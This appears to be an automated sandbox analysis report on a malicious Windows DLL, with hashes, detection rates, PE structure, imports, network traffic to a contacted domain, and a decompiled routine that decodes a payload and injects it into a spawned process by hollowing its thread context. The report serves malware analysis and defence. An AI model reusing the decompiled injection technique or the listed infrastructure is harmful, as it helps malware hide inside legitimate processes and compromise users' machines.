SSDEEP:6144:X5fVAHOvzY7zHY0Uxen/0TP1a2arz7JjOGG3v2WYXmpHdwpc2:X5wgmY0ZMTZIOGyv2WYWNdI
MD5:D2852A3B2A20846528CEC53426FD5F9C
SHA1:1FA892F9280708E7C82E958BEC516BB2B09351F3
SHA-256:8E50DA51386C2F267AFAF1A419E4467D62C01C9704F0E17C4AA188D0C090C8B2
SHA-512:247FAE9F2C9BDCA9D7EB4F44996E7E28D2CD9B7C87EA05A15B72ECB073750C8D9199D585771366687C43D802EB474E9486BB328D2984ABEB4AACEE62916CA2B6
Malicious:true
Antivirus:
  • Antivirus: Virustotal, Detection: 58%, Browse
  • Antivirus: Metadefender, Detection: 24%, Browse
  • Antivirus: ReversingLabs, Detection: 50%
Reputation:low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.M.V.M.V.M.V.S...Y.V.S...$.V.D...H.V.M.W.=.V.S...d.V.S...L.V.S...L.V.S...L.V.RichM.V.........................PE..L.....hK...........!.....<..........L........P............................................@..........................t..E....k..<....................................Q...............................W..@............P...............................text....:.......<.................. ..`.rdata...$...P...&...@..............@..@.data....1...........f..............@....rsrc................~..............@..@.reloc..~%.......&..................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.696631640331289
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:ERRoqGpsIS.dll
File size:371200
MD5:d2852a3b2a20846528cec53426fd5f9c
SHA1:1fa892f9280708e7c82e958bec516bb2b09351f3
SHA256:8e50da51386c2f267afaf1a419e4467d62c01c9704f0e17c4aa188d0c090c8b2
SHA512:247fae9f2c9bdca9d7eb4f44996e7e28d2cd9b7c87ea05a15b72ecb073750c8d9199d585771366687c43d802eb474e9486bb328d2984abeb4aacee62916ca2b6
SSDEEP:6144:X5fVAHOvzY7zHY0Uxen/0TP1a2arz7JjOGG3v2WYXmpHdwpc2:X5wgmY0ZMTZIOGyv2WYWNdI
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.M.V.M.V.M.V.S...Y.V.S...$.V.D...H.V.M.W.=.V.S...d.V.S...L.V.S...L.V.S...L.V.RichM.V.........................PE..L.....hK...

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x10038f4c
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE
Time Stamp:0x4B688CFC [Tue Feb 2 20:37:16 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:ac24111956da8096856f399aab20c9c0

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FCD40E11727h
call 00007FCD40E17991h
push dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+10h]
mov edx, dword ptr [ebp+0Ch]
call 00007FCD40E11611h
pop ecx
pop ebp
retn 000Ch
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [10058628h+ecx*8]
je 00007FCD40E11735h
inc ecx
cmp ecx, 2Dh
jc 00007FCD40E11713h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FCD40E11730h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [1005862Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FCD40E13B21h
test eax, eax
jne 00007FCD40E11728h
mov eax, 10058790h
ret
add eax, 08h
ret
call 00007FCD40E13B0Eh
test eax, eax
jne 00007FCD40E11728h
mov eax, 10058794h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007FCD40E11707h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007FCD40E116A7h
pop ecx
mov esi, eax
call 00007FCD40E116E1h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [1006A5ECh], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h

Rich Headers

Programming Language:
  • [ C ] VS2008 build 21022
  • [ASM] VS2008 build 21022
  • [LNK] VS2008 build 21022
  • [RES] VS2008 build 21022
  • [EXP] VS2008 build 21022
  • [IMP] VS2008 SP1 build 30729
  • [C++] VS2008 build 21022

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x574800x45.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x56b9c0x3c.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x518.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d0000x16f8.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x451c00x1c.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x557c80x40.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x450000x18c.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x43abe0x43c00False0.716375259456data6.67890498403IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0x450000x124c50x12600False0.576570471939data6.42887953464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x580000x131c40x1800False0.326822916667data4.20462332091IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x6c0000x5180x600False0.376953125data2.9425525328IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x6d0000x257e0x2600False0.490748355263data4.89739942249IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_STRING0x6c3e00x138dataEnglishUnited States
RT_VERSION0x6c0a00x340dataEnglishUnited States

Imports

DLLImport
KERNEL32.dllGetFileAttributesA, GetTempFileNameA, CopyFileA, GetShortPathNameA, GetEnvironmentVariableA, WaitForMultipleObjects, QueryPerformanceCounter, CreateFileA, GetWindowsDirectoryA, GetSystemTime, OpenProcess, GetVersionExA, GetModuleHandleA, GetDateFormatA, SizeofResource, LoadResource, Sleep, GetCurrentDirectoryA, VirtualProtect, FindFirstChangeNotificationA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetFileAttributesA, GetLastError, DuplicateHandle, GetCurrentProcess, CloseHandle, HeapFree, HeapReAlloc, HeapAlloc, RtlUnwind, GetCurrentThreadId, GetCommandLineA, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetStdHandle, EnterCriticalSection, LeaveCriticalSection, GetFileType, SetHandleCount, GetStdHandle, GetStartupInfoA, DeleteCriticalSection, GetProcAddress, WriteFile, GetModuleFileNameA, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, ExitProcess, RaiseException, HeapSize, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetConsoleCP, GetConsoleMode, SetFilePointer, SetEndOfFile, GetProcessHeap, ReadFile, LoadLibraryA, GetLocaleInfoA, GetStringTypeA, GetStringTypeW
WINSPOOL.DRVGetJobA, EnumPrintersA, GetPrinterDataA, AddPrinterConnectionA, OpenPrinterA, DocumentPropertiesA, ClosePrinter

Exports

NameOrdinalAddress
Knowequal10x10031210

Version Infos

DescriptionData
LegalCopyrightCopyright 2006, Pound sense Blackmiss
InternalNameRain.dll
FileVersion2.8.7.867
CompanyNamePound sense
LegalTrademarksTrade shout
Commentshttp://www.enoughthose.de
ProductNameTrade shout Modernplant
ProductVersion2.8.7.867
FileDescriptionTrade shout
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 14, 2021 15:14:49.487767935 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.534969091 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.535067081 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.610646009 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.659398079 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.666059971 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.666114092 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.666140079 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.666178942 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.751667023 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.798507929 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.798583984 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:14:49.798669100 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.812918901 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:14:49.859961033 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.933207989 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.933254957 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.933281898 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.933309078 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.934592962 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:29.948129892 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:29.948185921 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:29.994148016 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:29.994843960 CET44349728104.21.45.75192.168.2.3
Feb 14, 2021 15:16:29.995969057 CET49728443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.043862104 CET44349740104.21.45.75192.168.2.3
Feb 14, 2021 15:16:30.044997931 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.045798063 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.095467091 CET44349740104.21.45.75192.168.2.3
Feb 14, 2021 15:16:30.100220919 CET44349740104.21.45.75192.168.2.3
Feb 14, 2021 15:16:30.101340055 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.102818966 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.111588001 CET49740443192.168.2.3104.21.45.75
Feb 14, 2021 15:16:30.152415991 CET44349740104.21.45.75192.168.2.3
Feb 14, 2021 15:16:30.158453941 CET44349740104.21.45.75192.168.2.3

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 14, 2021 15:13:53.779870987 CET5598453192.168.2.38.8.8.8
Feb 14, 2021 15:13:53.833713055 CET53559848.8.8.8192.168.2.3
Feb 14, 2021 15:13:54.783674002 CET6418553192.168.2.38.8.8.8
Feb 14, 2021 15:13:54.834642887 CET53641858.8.8.8192.168.2.3
Feb 14, 2021 15:13:55.744131088 CET6511053192.168.2.38.8.8.8
Feb 14, 2021 15:13:55.797287941 CET53651108.8.8.8192.168.2.3
Feb 14, 2021 15:13:56.768134117 CET5836153192.168.2.38.8.8.8
Feb 14, 2021 15:13:56.818962097 CET53583618.8.8.8192.168.2.3
Feb 14, 2021 15:13:58.000653028 CET6349253192.168.2.38.8.8.8
Feb 14, 2021 15:13:58.051071882 CET53634928.8.8.8192.168.2.3
Feb 14, 2021 15:13:58.969991922 CET6083153192.168.2.38.8.8.8
Feb 14, 2021 15:13:59.018657923 CET53608318.8.8.8192.168.2.3
Feb 14, 2021 15:14:02.556644917 CET6010053192.168.2.38.8.8.8
Feb 14, 2021 15:14:02.614069939 CET53601008.8.8.8192.168.2.3
Feb 14, 2021 15:14:03.568470001 CET5319553192.168.2.38.8.8.8
Feb 14, 2021 15:14:03.617177010 CET53531958.8.8.8192.168.2.3
Feb 14, 2021 15:14:04.558250904 CET5014153192.168.2.38.8.8.8
Feb 14, 2021 15:14:04.608815908 CET53501418.8.8.8192.168.2.3
Feb 14, 2021 15:14:05.496462107 CET5302353192.168.2.38.8.8.8
Feb 14, 2021 15:14:05.545178890 CET53530238.8.8.8192.168.2.3
Feb 14, 2021 15:14:06.416781902 CET4956353192.168.2.38.8.8.8
Feb 14, 2021 15:14:06.468369007 CET53495638.8.8.8192.168.2.3
Feb 14, 2021 15:14:07.459033966 CET5135253192.168.2.38.8.8.8
Feb 14, 2021 15:14:07.516412973 CET53513528.8.8.8192.168.2.3
Feb 14, 2021 15:14:27.337965012 CET5934953192.168.2.38.8.8.8
Feb 14, 2021 15:14:27.396882057 CET53593498.8.8.8192.168.2.3
Feb 14, 2021 15:14:33.424895048 CET5708453192.168.2.38.8.8.8
Feb 14, 2021 15:14:33.475251913 CET53570848.8.8.8192.168.2.3
Feb 14, 2021 15:14:34.051234007 CET5882353192.168.2.38.8.8.8
Feb 14, 2021 15:14:34.099978924 CET53588238.8.8.8192.168.2.3
Feb 14, 2021 15:14:42.394396067 CET5756853192.168.2.38.8.8.8
Feb 14, 2021 15:14:42.455096006 CET53575688.8.8.8192.168.2.3
Feb 14, 2021 15:14:43.366034031 CET5054053192.168.2.38.8.8.8
Feb 14, 2021 15:14:43.424896955 CET53505408.8.8.8192.168.2.3
Feb 14, 2021 15:14:49.401484966 CET5436653192.168.2.38.8.8.8
Feb 14, 2021 15:14:49.471363068 CET53543668.8.8.8192.168.2.3
Feb 14, 2021 15:14:55.091443062 CET5303453192.168.2.38.8.8.8
Feb 14, 2021 15:14:55.215946913 CET53530348.8.8.8192.168.2.3
Feb 14, 2021 15:15:09.721174002 CET5776253192.168.2.38.8.8.8
Feb 14, 2021 15:15:09.772667885 CET53577628.8.8.8192.168.2.3
Feb 14, 2021 15:15:12.800273895 CET5543553192.168.2.38.8.8.8
Feb 14, 2021 15:15:12.858443975 CET53554358.8.8.8192.168.2.3
Feb 14, 2021 15:15:44.174472094 CET5071353192.168.2.38.8.8.8
Feb 14, 2021 15:15:44.226191044 CET53507138.8.8.8192.168.2.3
Feb 14, 2021 15:15:46.026094913 CET5613253192.168.2.38.8.8.8
Feb 14, 2021 15:15:46.086096048 CET53561328.8.8.8192.168.2.3
Feb 14, 2021 15:16:42.294533014 CET5898753192.168.2.38.8.8.8
Feb 14, 2021 15:16:42.383766890 CET53589878.8.8.8192.168.2.3
Feb 14, 2021 15:16:43.128657103 CET5657953192.168.2.38.8.8.8
Feb 14, 2021 15:16:43.219723940 CET53565798.8.8.8192.168.2.3
Feb 14, 2021 15:16:43.708333015 CET6063353192.168.2.38.8.8.8
Feb 14, 2021 15:16:43.768307924 CET53606338.8.8.8192.168.2.3
Feb 14, 2021 15:16:44.137789965 CET6129253192.168.2.38.8.8.8
Feb 14, 2021 15:16:44.194751024 CET53612928.8.8.8192.168.2.3
Feb 14, 2021 15:16:44.588352919 CET6361953192.168.2.38.8.8.8
Feb 14, 2021 15:16:44.637173891 CET53636198.8.8.8192.168.2.3
Feb 14, 2021 15:16:45.082493067 CET6493853192.168.2.38.8.8.8
Feb 14, 2021 15:16:45.142441034 CET53649388.8.8.8192.168.2.3
Feb 14, 2021 15:16:45.608637094 CET6194653192.168.2.38.8.8.8
Feb 14, 2021 15:16:45.667982101 CET53619468.8.8.8192.168.2.3
Feb 14, 2021 15:16:46.241221905 CET6491053192.168.2.38.8.8.8
Feb 14, 2021 15:16:46.300915003 CET53649108.8.8.8192.168.2.3
Feb 14, 2021 15:16:46.914968014 CET5212353192.168.2.38.8.8.8
Feb 14, 2021 15:16:46.972372055 CET53521238.8.8.8192.168.2.3
Feb 14, 2021 15:16:47.374217987 CET5613053192.168.2.38.8.8.8
Feb 14, 2021 15:16:47.436702013 CET53561308.8.8.8192.168.2.3

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Feb 14, 2021 15:14:49.401484966 CET192.168.2.38.8.8.80xddeStandard query (0)earfetti.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
Feb 14, 2021 15:14:33.475251913 CET8.8.8.8192.168.2.30xd5beNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
Feb 14, 2021 15:14:49.471363068 CET8.8.8.8192.168.2.30xddeNo error (0)earfetti.com104.21.45.75A (IP address)IN (0x0001)
Feb 14, 2021 15:14:49.471363068 CET8.8.8.8192.168.2.30xddeNo error (0)earfetti.com172.67.211.56A (IP address)IN (0x0001)

HTTPS Packets

TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
Feb 14, 2021 15:14:49.666114092 CET104.21.45.75443192.168.2.349728CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Jan 28 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Fri Jan 28 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5348 Parent PID: 5640

General

Start time:15:13:59
Start date:14/02/2021
Path:C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):true
Commandline:loaddll32.exe 'C:\Users\user\Desktop\ERRoqGpsIS.dll'
Imagebase:0x150000
File size:121856 bytes
MD5 hash:99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 6344 Parent PID: 5348

General

Start time:15:14:44
Start date:14/02/2021
Path:C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):true
Commandline:msiexec.exe
Imagebase:0x12a0000
File size:59904 bytes
MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Chronological Activities

Disassembly

Code Analysis

Reset < >

    Analysis Process: loaddll32.exe PID: 5348 Parent PID: 5640 loaddll32.exeCOMMON

    Executed Functions

    Function 6E4CDD00, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 434threadinjectionmemoryCOMMON
    Download Yara Rule
    C-Code - Quality: 90%
    			E6E4CDD00(signed char __edx, void* __eflags) {
				signed int _v20;
				void* _v24;
				long _v28;
				long _v32;
				void* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				signed int _v76;
				intOrPtr _v114;
				char _v115;
				char _v129;
				signed int _v133;
				char _v134;
				long _v138;
				char _v139;
				void* _v143;
				void _v144;
				char _v156;
				char _v171;
				struct _CONTEXT _v888;
				char _v1408;
				void* __ebx;
				void* __edi;
				signed int _t93;
				void* _t104;
				void* _t105;
				signed int _t107;
				void* _t110;
				int _t114;
				void* _t117;
				signed char _t118;
				void* _t124;
				int _t130;
				signed char _t131;
				long _t134;
				long _t135;
				long _t136;
				void* _t137;
				void* _t140;
				void* _t148;
				void* _t150;
				int _t154;
				void* _t155;
				CONTEXT* _t156;
				int _t159;
				long _t161;
				signed char _t164;
				int _t166;
				int _t173;
				signed char _t182;
				void* _t186;
				void* _t187;
				void* _t191;
				signed int _t192;
				void* _t194;
				signed int _t198;
				intOrPtr _t218;
				struct _STARTUPINFOA* _t219;
				long _t220;
				long _t222;
				signed int _t224;
				void* _t231;
				void* _t245;

				_t272 = __eflags;
				_t216 = __edx;
				E6E4BC760(__eflags); // executed
				_v52 =  *0x6e4d50e4 * 0x129;
				E6E4BCD90(_t272); // executed
				_t93 = _v52;
				_t198 = _t93 ^ 0x00000008;
				_v76 = _t198;
				_v52 = _t198 | _t93;
				E6E4B5D80(_t272); // executed
				E6E4BB7E0(_t272); // executed
				E6E4B7830(_t272); // executed
				E6E4B43A0(_t272); // executed
				_t225 = 0xffffffff;
				if(E6E4CF860() == 0) {
					return 0xffffffff;
				}
				E6E4BAF90();
				if( *0x6e4d7a64 == 0) {
					L19:
					E6E4CF5C0(0, E6E4B8AE0(0xfd7969f));
					ExitProcess(0);
				}
				_t104 = E6E4CF5C0(0, E6E4B8AE0(0x7f471fb));
				_t225 = _t104;
				_t218 =  *0x6e4d7a64; // 0x6e4b0000
				_t105 = E6E4B8AE0(0x82efb88);
				_t231 = _t231 + 0x10;
				 *_t104(_t218,  &_v1408, _t105);
				_t107 =  *0x6e4d7a64; // 0x6e4b0000
				_v40 = _t107;
				if(_t107 == 0) {
					goto L19;
				}
				_t219 =  &_v144;
				E6E4BAF10(_t219, 0x44);
				_v144 = 0x44;
				_t110 = E6E4B1250(0x6e4d38a8,  &_v156);
				_t225 =  &_v888;
				E6E4B59B0(_t225, _t110, 0xffffffff);
				E6E4CF5C0(0, E6E4B8AE0(0x9cf9acd));
				_t231 = _t231 + 0x28;
				_t114 = CreateProcessA(0, _t225, 0, 0, 0, 4, 0, 0, _t219,  &_v68); // executed
				if(_t114 != 1) {
					goto L19;
				}
				_t220 = E6E4C32B0(_v40);
				E6E4CF5C0(0, 0x8cae838);
				_t117 = VirtualAllocEx(_v68.hProcess, 0, _t220, 0x3000, 4); // executed
				_t187 = _t117;
				_t118 = E6E4B5BF0(_t117, 0);
				_t231 = _t231 + 0x14;
				_t277 = _t118 & 0x00000001;
				if((_t118 & 0x00000001) != 0) {
					goto L19;
				}
				 *(E6E4C6270() + 0x49c) = _t187;
				E6E4D29B0(_t225, _t277,  &_v1408);
				E6E4BE4D0(_t225);
				E6E4D2960(_t225);
				_v28 = _t220;
				_t221 = _v40;
				_t124 = E6E4CD230(_v40, _t220); // executed
				_t225 = _t124;
				E6E4B9560(_t124, _v40);
				_v36 = _t187;
				E6E4B6340(_t187, _t221, _t277, _t225, _t187);
				_t245 = _t231 + 0x1c;
				_v48 = E6E4C88F0(_t277);
				if(_v28 == 0) {
					L8:
					_v32 = 0;
					E6E4CF5C0(0, E6E4B8AE0(0x2664a75));
					_t222 = _v28;
					_t130 = WriteProcessMemory(_v68.hProcess, _v36, _t225, _t222,  &_v32); // executed
					_t131 = E6E4B4C00(_t130, 1);
					_t231 = _t245 + 0x14;
					if((_t131 & 0x00000001) != 0) {
						_v20 = E6E4CF5C0(0, 0x8cae838);
						_v24 = _v68.hProcess;
						_t134 = E6E4B8AE0(0x82eface);
						_t135 = E6E4B8AE0(0x82eca8c);
						_t136 = E6E4B8AE0(0x82efa88);
						_t231 = _t231 + 0x14;
						_t225 = _v36;
						_t137 = VirtualAllocEx(_v24, 0, _t134, _t135, _t136);
						_t282 = _t137;
						if(_t137 != 0) {
							_v144 = 0xbe;
							_v143 = _t225;
							_v139 = 0xb9;
							_v138 = _t222;
							_v134 = 0xb8;
							_v133 = _v48;
							_t140 = E6E4CFCE0( &_v171,  &_v32, _t216, 0x6e4d3ab4, 0xf,  &_v171);
							_v20 = _t137;
							E6E4C6ED0( &_v129, _t140, E6E4B8AE0(0x82efa82));
							_v115 = E6E4B27A0(0x65);
							_t148 = E6E4B6CC0(_t282, E6E4B6CC0(_t282, E6E4B30FE,  ~_v40), 0xa3bdd5cd);
							_t191 = _v20;
							_t150 = E6E4B2640(E6E4B6CC0(_t282, _t148, _t225), 0xa3bdd5cd);
							_v114 = E6E4B2640(0, _t191) + _t150;
							E6E4CF5C0(0, 0xa48b0f9);
							_t231 = _t231 + 0x50;
							_t225 =  &_v32;
							_t154 = WriteProcessMemory(_v68.hProcess, _t191,  &_v144, 0x42,  &_v32); // executed
							if(_t154 == 1) {
								_t155 = E6E4B8AE0(0x82ef840);
								_t156 =  &_v888;
								E6E4BAF10(_t156, _t155);
								_v888.ContextFlags = 0x10001;
								E6E4CF5C0(0, 0x4bbc7e4);
								_t159 = GetThreadContext(_v68.hThread, _t156); // executed
								_v44 = _t159;
								_v24 = E6E4CF5C0(0, 0xd1a4de8);
								_t161 = E6E4B8AE0(0x82eface);
								_t225 = _t161;
								_t164 = E6E4B4C00(VirtualProtectEx(_v68.hProcess, _t191, _t161, E6E4B8AE0(0x82efa9c),  &_v32), 1);
								_t231 = _t231 + 0x2c;
								if((_t164 & 0x00000001) != 0) {
									_v888.Eip = _t191;
									_t192 = 1;
									if(_v44 == 1) {
										E6E4CF5C0(0, E6E4B8AE0(0xc947d68));
										_t231 = _t231 + 0xc;
										_t173 = SetThreadContext(_v68.hThread,  &_v888); // executed
										_t192 = 0 | _t173 != 0x00000001;
									}
									E6E4CF5C0(0, 0xd1a4de8);
									_t231 = _t231 + 8;
									_t166 = VirtualProtectEx(_v68.hProcess, _v36, _v28, 0x40,  &_v32); // executed
									if(_t166 == 1) {
										if(_t192 == 0) {
											E6E4CF5C0(0, 0xb232744);
											_t231 = _t231 + 8;
											_push(_v68.hThread);
										} else {
											E6E4CF5C0(0, E6E4B8AE0(0xea5eff8));
											_t231 = _t231 + 0xc;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t194 = 0;
					_t224 = _v48;
					_v72 = _t225;
					0;
					do {
						_t209 =  *(_t225 + _t194) & 0x000000ff;
						_v24 =  !( *(_t225 + _t194) & 0x000000ff) & 0x0000008f;
						_v44 = E6E4B2120(0x8f, 0xff);
						_t225 = _v72;
						_v20 = E6E4B7740(0, _t209, _t177 & 0x000000ff);
						_t182 = E6E4B7740(0,  !_t224 & 0x000000ff, 0x8f);
						_t216 = _v44 & 0x000000ff & _t224;
						_v20 = _v20 & 0x000000ff | _v24;
						 *(_t225 + _t194) = E6E4B9950(_t182 & 0x000000ff, _v44 & 0x000000ff & _t224 & 0x000000ff) ^ _v20;
						asm("rol edi, 0x8");
						_t186 = E6E4B6CC0(0, _t194 + 0x26251827, 1);
						_t245 = _t245 + 0x28;
						_t194 = _t186 + 0xd9dae7d9;
					} while (_t194 != _v28);
					goto L8;
				}
			}






































































    0x6e4cdd00
    0x6e4cdd00
    0x6e4cdd0c
    0x6e4cdd1b
    0x6e4cdd1e
    0x6e4cdd23
    0x6e4cdd28
    0x6e4cdd2b
    0x6e4cdd30
    0x6e4cdd33
    0x6e4cdd38
    0x6e4cdd3d
    0x6e4cdd42
    0x6e4cdd47
    0x6e4cdd53
    0x6e4ce25f
    0x6e4ce25f
    0x6e4cdd59
    0x6e4cdd65
    0x6e4ce235
    0x6e4ce245
    0x6e4ce24f
    0x6e4ce24f
    0x6e4cdd7b
    0x6e4cdd83
    0x6e4cdd85
    0x6e4cdd90
    0x6e4cdd95
    0x6e4cdda1
    0x6e4cdda3
    0x6e4cdda8
    0x6e4cddad
    0x00000000
    0x00000000
    0x6e4cddb3
    0x6e4cddbc
    0x6e4cddc4
    0x6e4cddda
    0x6e4cdde2
    0x6e4cddec
    0x6e4cde04
    0x6e4cde09
    0x6e4cde20
    0x6e4cde25
    0x00000000
    0x00000000
    0x6e4cde36
    0x6e4cde3f
    0x6e4cde54
    0x6e4cde56
    0x6e4cde5b
    0x6e4cde60
    0x6e4cde63
    0x6e4cde65
    0x00000000
    0x00000000
    0x6e4cde70
